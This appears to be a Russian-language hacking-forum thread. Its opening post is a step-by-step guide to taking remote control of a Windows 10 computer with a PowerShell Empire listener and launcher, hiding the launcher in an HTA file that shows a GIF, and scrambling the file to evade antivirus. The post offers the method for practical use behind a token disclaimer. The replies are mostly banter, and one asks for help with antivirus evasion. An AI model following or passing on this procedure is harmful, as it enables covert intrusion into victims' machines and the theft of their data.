Загрузка...

PC hacking with GIF

Thread in Kali Linux created by OGPLUG Mar 31, 2020. 4674 views

  1. OGPLUG
    OGPLUG Topic starter Mar 31, 2020 Banned 624 Apr 7, 2018
    Статья написана в образовательных целях и не призывает к каким либо противозаконным действиям. Не несу ответственности за любой возможный вред, причиненный материалами данной статьи.

    В ходе работы будем использовать
    PowerShell Empire 2


    Установка PowerShell Empire 2
    Для начала необходимо скачать данную утилиту с GitHub(не реклама)

    Команды буду выделять в своем терминале Kali Linux:
    Code
    git clone https://github.com/EmpireProject/Empire.git
    [IMG]

    Далее необходимо провести установку. После переходим в папку Empire. Выполняем несколько команд.
    Code
    cd Empire/
    cd setup
    ./install.sh
    [IMG]

    Далее необходимо вернуться в директорию и запустить файл. Для этого выполняем такие команды, после чего произойдет запуск утилиты:
    Code
    cd ..
    ./empire
    [IMG]

    Как создать исполняемую команду в PowerShell Empire 2
    Чтобы получить доступ над нашей целью необходимо чтобы сгенерированный код был запущенный в командной строке. Сначала попробуем провести атаку, напрямую выполнив команду в Windows 10, а далее будем использовать метод, который позволит хорошо скрыть наш код.

    Для начала необходимо запустить команду и проверить активных "слушателей":

    Code
    liseners

    Далее создадим учетную запись, которая позволит получить активные профиль для дальнейшего тестирования, для этого выполняем команды:
    Code
    uselistener http
    execute
    listeners
    Проверяем наш созданный профиль
    [IMG]

    Далее необходимо генерировать код для запуска для этого выполняем команду:
    Code
    launcher powershell http
    [IMG]

    После этого копируем полученный код и запускаем его в командной строке на ОС нашей цели. Я для теста использовал Windows 10. После запуска на винде процесс обрабатывается и закрывается, а мы получаем сессию. После этого в терминале появиться такое окно:
    [IMG]

    Маскируем наш код в GIF картинку

    Для этого нам нужен код, который мы генерировали в предыдущих шагах. Рассмотрим выполнения этой процедуры в несколько шагов.
    Хочу отметить сразу, что способ очень эффективный, так как не обнаруживается многими антивирусами.

    Подготавливаем наш скрипт
    Далее необходимо добавить себе в блокнот. После этого необходимо вставить код из PowerShell Empire 2 в 37 строчку, как показано на скриншоте:
    [IMG]

    Конвертируем GIF-ку и добавляем в скрипт

    Для этого можно воспользоваться этим сервисом. Добавляем любую картинку в формате .gif и нажимаем convert to Base64
    [IMG]
    Далее необходимо добавить полученный код в наш скрипт, который мы использовали в первом шаге. Добавляем в 17 строку, как на скриншоте:
    [IMG]
    Скрываем вредоносный файл от антивирусов

    Сделаем это с помощью программы Script Encoder Plus. Скачиваем, распаковываем, запускаем и выбираем операцию "Scramble" во вкладке "Script in "Before"", а в меню "Scripts"-"Encode script", более детально можно увидеть на скриншоте:


    [IMG]
    После этого остается скопировать полученный результат в текстовый файл с форматом .hta. После запуска на компьютере нашей цели появиться гифка, а у нас успешная сессия. Способ очень интересный и его легко использоват на практике. Берите на заметку.


     
  2. ChtoDelati
    ChtoDelati Mar 31, 2020 Banned 48 Sep 12, 2019
    Прикольно:finger_up:
     
  3. Blaque
    Blaque Mar 31, 2020 2510 Apr 3, 2018
    Видно что оформить ты старался конечно, но легче видос от овера глянуть, там хоть кровь из глаз не пойдет
     
    1. OGPLUG Topic starter
  4. VVannaCry
    VVannaCry Mar 31, 2020 Banned 55 Mar 24, 2020
    Ммм линукс:Rotvgovne:
     
  5. Крашер_inactive3006499
    Взломал себя:trash:
     
  6. 1mNotS0rr1
    1mNotS0rr1 Mar 31, 2020 Banned 119 May 26, 2018
    Спизженно от овербафера вроде
     
    1. OGPLUG Topic starter
      1mNotS0rr1, не спиздил, а адаптировал:podumai:
    2. LUMMER_inactive644639
      1mNotS0rr1, овербафер сам говорил что берет все с форумов
  7. TUBERKULEZ_inactive2784494
    Че там, склейка *******а и гифки?
     
  8. GanjaManKING
    Можете подсказать как зашифровать этот код от антивирусов
     
  9. al000al
    al000al Jun 13, 2020 0 Nov 8, 2018
    а где скрипт?ссылку не вижу
     
  10. akeela
    akeela Jun 13, 2020 4613 Nov 16, 2019
    Тему подобную видел, симпы достойна:2011_like:
     
  11. Brinzzza_inactive3335475
    Нихуя не понял, но очень интересно!
     
  12. ParTon_inactive2754248
    паст...
     
  13. renameduser_85661
    когда будет взлом с помощью анальной пробки???
     
    1. OGPLUG Topic starter
      renameduser_85661, если хочешь, можно реализовать, специально для тебя:cool_bun:
  14. herokugtr
    herokugtr May 29, 2024 1 Mar 15, 2021
    слыхал что недавно гифкой прям в телеге ломали ?
     
    1. God_likeGL Layer 1
      Тема в разделе Kali Linux создана пользователем OGPLUG 31 мар 2020
    2. herokugtr
      God_likeGL, та пофиг) сути не меняет
Loading...
Top